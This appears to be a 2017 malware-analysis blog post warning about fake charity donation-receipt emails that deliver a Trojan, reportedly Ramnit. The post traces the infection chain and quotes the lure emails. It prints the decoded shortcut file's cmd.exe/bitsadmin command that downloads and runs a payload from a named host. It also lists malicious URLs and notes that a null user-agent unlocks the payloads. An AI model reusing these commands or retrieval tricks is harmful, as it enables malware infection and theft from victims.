It is difficult to think of a more evil scam than to pretend to collect donations for Migrant Helpline, use spoofed emails saying thanks for the donation to Migrant Helpline and deliver malware to the email recipient.
Update 11 January 2017: Another set this time pretending to be nej-donations ( After being sent a few more of these, I can see that they are actually using random characters before the donations in the charity name, So you get alleged charities like HHGG-Donations, FGTD-Donations, etc. The John Smith Drive address remains constant, although the town and phone number changes in each sample. )Thanks to all those concerned people that have sent these to me.
NEJ-Donations works with others to overcome poverty and suffering. NEJ-Donations GB is a member of NEJ-Donations International. NEJ-Donations is a registered charity in England and Wales (no 559061) and Scotland (SCO 809501) and a company limited by guarantee registered in England No 144836 at NEJ-Donations House, John Smith Drive, AB53 Kirktown of Auchterless. Registered Charity No. 841330. Tel: 28985029393.
The Link in email goes to ‘http://ref642.spinawind.com/donation-receipt-11012017-69657278.pdf’ which downloads a lnk file from virtualonhold.com/donation-receipt-11012017-69657278.lnk Which is base64 encoded. My feeble attempts at decoding it to get a download url are failing and giving me garbage . Hopefully one of my contacts will work it out. ZIp file P/W “infected” donation-receipt-11012017-69657278.lnk. Now decoded to https://weddingvendorsnearme.com/rugby/goal which gives goal.exe when you use a user-agent “null” ( virusTotal ) ( payload Security) I am pretty certain this will be ramnit again.
Update 10 January 2017: I was handed a tip this morning. Set user agent to null and you get the payload from http://gerdamen.info/cass/cars/moto ( VirusTotal) Payload Security Now analysing to see what it actually is. Some feedback suggests Ramnit Trojan which hasn’t been affecting UK for a long time.
Update 2 10 January 2017: There is a new malspam run of these emails coming out again tonight. The email looks functionally identical to the previous ones. It is very unusual for phishing or malware emails to have such a level of detail about the recipient / victim. They must have gained access to a hacked/compromised database somewhere. This sort of spear phishing with identifiable personal details is the hardest to protect against. A victim receiving such emails, almost automatically believes it must be true and real because they use their name & phone number, panic and click the link to see what is happening. Note that the malware gang are using a HTTPS secure SSL site. HTTPS padlock in browser bar does not mean the site is safe.
If you do not click the link in the email then you are perfectly safe and cannot be infected. Just delete the email and forget about it.
The link behind donation reference goes to http://donation03395665.blixt.us/tanya-thank-you-for-donation-reference-73160326.pdf (the name before thank-you is the recipients name) which bounces you silently on to https://openboxoffice.com/view/user/YeshivaDonations/Word/Donation_Reference.doc where you get a page looking like this screenshot
If you are unwise enough to press the button saying “download and install plugin update” you get a download of a .JS file ( ie_update_plugin_extension.js) from https://openboxoffice.com/view/update/ZS93YVZZMTNONHQrdHNNMGhIcWR1cWQvK2k2YVlVYkNXRUpSaWU5OFFjTnd5SmZ4aUNYYitHUXp5Nnp1bE5KbA%3D%3D ( Virus Total ) ( Payload Security ) which downloads via powershell from ‘http://uirok.info/old/ma’ where if you visit with a user-agent of NULL you get ma.exe ( VirusTotal) ( Payload Security) I am reliably informed it is ramnit
If you try to follow the original link from the email again, you get a page that has what appears to be a genuine invoice and no click buttons
I assume openboxoffice.com is a hacked compromised site because it also has been registered for a long time ( 10 years) . Currently hosted by EU-HOSTSAILOR 126.96.36.199
More recipients have been contacting me and informing me that the emails they are receiving appear to be directly targeting them, because they contain personal information that is not commonly available. I am informed that the Full name appearing in body of email is correct. The phone number is a correct number, And the worse part of it is the email address and variant of the name was only ever used on Paypal or Ebay, Nowhere else to the “victim’s” knowledge. This leads me to surmise that there has been a data leak somewhere. I personally doubt that it was Ebay or Paypal themselves, otherwise we would have heard about it by now. My gut feeling is that, if we were able to dig deep enough and get enough information from recipients, we would eventually find a common link. Possibly an Ebay Shop, where the “owner” has been hacked. Unfortunately many Ebay Shops also have their own web based shop using common CMS and shop software that gets frequently compromised.
Note: there are genuine yeshiva donations sites in various places on the web. Yeshiva is a Jewish educational system often funded by Charity individual donations. There is a genuine domain donation.yeshivadonations.com and yeshivadonations.com which appears to be hosted by Hostgator 188.8.131.52 I am guessing that the DNS has been compromised to divert to this hostgator site because it is registered to and was previously hosted by Godaddy. It would be extremely unusual for site that has been registered for a few years to be used for serving up malware unless it was compromised in some way. At 11.00 UTC 10 January 2017, all links on yeshivadonations.com are giving a 404, so hopefully Hostgator have taken down the site doing the spreading. However be aware that the actual site hosting the malware http://gerdamen.info/cass/cars/moto is still live and will infect you if you already have downloaded the lnk file by previously clicking the link in the email.
The email just has an image as the body content :
Link goes to http://<random characters>.fastfashun.com/thank-you-for-donation-reference.pdf
Examples http://uolarjs.fastfashun.com/thank-you-for-donation-reference.pdf http://bxbpmbhrc.fastfashun.com/thank-you-for-donation-reference.pdf
Which redirects to https://donation.yeshivadonations.com/thank-you-for-donation-reference.lnk I can download the lnk file but cannot get any payload from the site inside the file http://gerdamen.info/cass/cars/moto which gives me a 403 forbidden. I don’t know if it requires a referrer from the link or will only accept bits as a user agent. Trying to run it through Payload Security I get told it is a 64 bit file which will not run on a 32 bit system ( Cannot run a 64-bit native file on a 32-bit virtual machine )
L À Fû ÷¶4‡+‰Ë÷¶4‡+‰ËX7‡+‰Ë D / ) PàOÐ ê:i¢Ø +00 /C:\ R 1 ‘JP@ Windows < ï¾î:…’JP@* $ W i n d o w s V 1 (Jv8 System32 > ï¾î:†(Jv8* ä S y s t e m 3 2 R 2 D u=ü cmd.exe < ï¾u=üu=ü* YÌ c m d . e x e S 6 R ~q¡B Windows 7 C:\Windows\System32\cmd.exe * . . \ . . \ . . \ . . \ . . \ . . \ W i n d o w s \ S y s t e m 3 2 \ c m d . e x e C : \ W i n d o w s \ s y s t e m 3 2 … / c e x p l o r e r . e x e & b i t s a d m i n . e x e / t r a n s f e r d / p r i o r i t y h i g h h t t p : / / g e r d a m e n . i n f o / c a s s / c a r s / m o t o % A p p D a t a % \ m o t o . e x e & % A p p D a t a % \ m o t o . e x e ! % S y s t e m R o o t % \ s y s t e m 3 2 \ S H E L L 3 2 . d l l ø ¥ 1SPS0ñ%·ïG¥ñ`Œžë¬!
c m d . e x e ) A p p l i c a t i o n @ n~‡+‰Ë D @ n~‡+‰Ë ‰ 1SPSâŠXF¼L8C»ü“&˜mÎm . S – 1 – 5 – 2 1 – 2 0 6 1 4 4 2 2 4 7 – 5 9 8 7 7 0 0 5 1 – 3 3 4 4 0 4 6 4 4 6 – 1 0 0 0 Y 1SPSí0½ÚC ‰G§øÐ¤sf”= d S y s t e m 3 2 ( C : \ W i n d o w s ) e 1SPS¦jc(=•ÒµÖ ÀOÙÐI C : \ W i n d o w s \ S y s t e m 3 2 \ c m d . e x e % Õ wNÁç]N·D.±®Q˜·Õ ` X windows-t5vm49e šî°20K£í<‘xÉ¹\ŠýÆÔæ°‰ )Í}Ôšî°20K£í<‘xÉ¹\ŠýÆÔæ°‰ )Í}Ô
That is as far as I can get. Lets see what the real experts can do.
Update: I have received additional emails now with slightly different content in them;
Date: 9 January 2017 at 11:09:08 GMT
Subject: Thank you for choosing to donate to Migrant Helpline
Thank you for giving a much-needed donation of £361 to help families affected by the terrifying violence in Syria. With so many people who need our support, your gift is vital and greatly appreciated. Email not displaying correctly?
Thanks again for donating
We’re sending it straight to Migrant Helpline so you’ll be making a difference very soon.
Your donation details: First name: Last name: Tel. Amount: £361 Donation Reference: 47173243 If you have any questions about your donation, please follow this link and download Your (Donation Reference 47173243), with the transaction details listed above. With your help, YeshivaDonations can continue to work in Syria and neighbouring countries to deliver clean water and life-saving supplies to millions of people. Thank you again for your support. Your generosity is bringing much-needed assistance to families who have lost everything as a result of the crisis in Syria. Warm regards, YeshivaDonations
YeshivaDonations works with others to overcome poverty and suffering. YeshivaDonations GB is a member of YeshivaDonations International. YeshivaDonations is a registered charity in England and Wales (no 460744) and Scotland (SCO 945744) and a company limited by guarantee registered in England No 633693 at YeshivaDonations House, John Smith Drive, DL10 Whitwell. Registered Charity No. 738020. Tel: 76209829767.
This e-mail and any attachments are confidential and intended solely for the addressee and may also be privileged or exempt from disclosure under applicable law. If you are not the addressee, or have received this e-mail in error, please notify the sender immediately, delete it from your system and do not copy, disclose or otherwise act upon any part of this e-mail or its attachments.
Internet communications are not guaranteed to be secure or virus-free. The Barclays Group does not accept responsibility for any loss arising from unauthorised access to, or interference with, any Internet communications by any third party, or from the transmission of any viruses. Replies to this e-mail may be monitored by the Barclays Group for operational or business reasons.
Any opinion or other information in this e-mail or its attachments that does not relate to the business of the Barclays Group is personal to the sender and is not given or endorsed by the Barclays Group.
Barclays Bank PLC. Registered in England and Wales (registered no. 1026167). Registered Office: 1 Churchill Place, London, E14 5HP, United Kingdom. Barclays Bank PLC is authorised by the Prudential Regulation Authority and regulated by the Financial Conduct Authority and the Prudential Regulation Authority (Financial Services Register No. 122702).
The link in this email goes to http://donation62453.crypid.com/Sonia-thank-you-for-donation-reference-47173243.pdf but still downloads the same link file from https://donation.yeshivadonations.com/thank-you-for-donation-reference.lnk
There is no YeshivaDonations GB listed with the Charity Commission. None of the charity numbers listed in the emails exist or belong to any known Charity in UK